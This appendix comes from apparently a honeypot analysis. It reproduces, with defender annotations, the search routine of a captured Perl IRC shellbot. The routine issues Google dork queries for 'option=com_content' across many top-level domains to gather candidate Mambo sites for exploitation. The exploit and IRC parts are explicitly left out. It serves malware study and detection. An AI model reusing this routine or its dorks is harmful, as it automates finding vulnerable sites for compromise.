Appendix C - Sample code from a Perl bot

The following code is part of a shellbot which was captured by a honeypot. It is credited initially to atrix, with the spreading code credited to sirhot. When a command is issued to this bot via an IRC channel, it will reply 'Scanning for unpatched mambo ...'. It then performs a Google search, restricted to a random top-level domain, for the phrase "option=com_content" either in the body of the page or in the URL itself. Each host that is successfully exploited is reported via the IRC channel. The excerpt below covers only the search step, which builds the list of candidate hosts; the IRC command handling, the exploitation and the reporting are in parts of the bot not reproduced here.

# fetch() - candidate-host discovery step of the captured bot.
# Analysis annotations only: the code is kept exactly as captured so the
# listing stays usable as a reference sample.
#
# Builds a single search query for the string "option=com_content",
# restricted to one randomly chosen entry of a top-level-domain list, sends it
# through http_query() (defined outside this excerpt) and scrapes the result
# links out of the returned page.
#
# Takes no arguments (empty prototype).
# Returns: a list of strings, each being whatever followed "http://" in a
#          result anchor, excluding entries containing "google", "cache" or
#          "translate".
#
# Defender notes: every query produced here contains "option=com_content",
# num=80 or num=160, and a start offset that is 0..9 times that num value.
# Outbound search requests of this shape originating from a server rather
# than a browser are a useful egress/proxy-log indicator for this sample.
sub fetch(){
    # Random values pick the page size and result offset, so repeated runs ask
    # for different slices of the search results.
    my $rnd=(int(rand(9999)));
    my $n= 80;
    # Roughly half the time the page size is doubled from 80 to 160.
    if ($rnd<5000) { $n<<=1;}
    # Start offset: a whole number of pages, 0 through 9.
    my $s= (int(rand(10)) * $n);
    # TLD list ("dominios" = domains). It contains duplicates (e.g. "ar", "fi",
    # "vc") and ends with an empty string, which yields a query with no TLD
    # restriction at all.
    my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
                "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
                "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
                "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
                "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
                "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
                "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
                "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",         
                "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
                "vu","vn","ye","yu","cd","zm","zw","");

    # Pool of pre-encoded query strings, two per TLD entry.
    my @str;

    # NOTE(review): $dom is not declared with "my", so it is a package global;
    # this sub would not compile under "use strict".
    foreach $dom  (@dominios)

    {
        # Variant 1: quoted phrase anywhere in the page, limited with site:<tld>.
        # Variant 2: inurl: match on "<tld>/index.php?option=com_content".
        push (@str,"%22option=com_content%22+site%3A".$dom."%20",
          "inurl:%22".$dom."/index.php?option=com_content%22");
    }

    # Query target is given without a scheme; how it is requested depends on
    # http_query(), which is not part of this excerpt.
    my $query="www.google.com/search?q=";

    # rand() returns a fractional value; the array subscript truncates it, so
    # this selects one pool entry at random.
    $query.=$str[(rand(scalar(@str)))];

    # Page size and offset chosen at the top of the sub.
    $query.="&num=$n&start=$s";
    my @lst=();

    my $page = http_query($query);
    # Scrape anchors of the form <a class=l href="http://...">, presumably the
    # result-link markup of the search page at the time of capture. The capture
    # runs up to the first '>' or '"', so it holds host plus path, not only the
    # host name.
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){

        # Drop links that point back at the search engine's own pages.
        if ($1 !~ m/google|cache|translate/){

            push (@lst,$1);
        }
    }

    # Candidate list handed back to the caller (caller not shown here).
    return (@lst);
}